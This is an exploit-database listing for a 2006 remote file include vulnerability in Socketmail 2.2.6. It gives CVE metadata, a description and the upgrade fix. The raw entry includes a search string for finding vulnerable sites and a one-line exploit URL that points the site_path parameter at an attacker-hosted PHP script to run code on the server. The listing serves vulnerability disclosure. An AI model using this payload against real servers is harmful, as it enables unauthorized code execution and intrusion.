header-logo
Suggest Exploit
vendor:
Socketmail
by:
Aesthetico
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Socketmail
Affected Version From: 2.2.6
Affected Version To: 2.2.6
Patch Exists: YES
Related CWE: CVE-2006-2590
CPE: a:creative_digital_resources:socketmail
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

Socketmail <= 2.2.6 - Remote File Include Vulnerability

Socketmail is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process. This may facilitate unauthorized access or privilege escalation.

Mitigation:

Upgrade to version 2.2.7 or later.
Source

Exploit-DB raw data:

Title: Socketmail <= 2.2.6 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: Creative Digital Resources
URL: http://socketmail.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "Powered by SocketMail"
-----------------------------------------------------------------

Exploitation(tested with Lite-Edition and Pro-Edition):

/index.php?site_path=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-05-25]

Navigation

Suggest Exploit

Services By CQR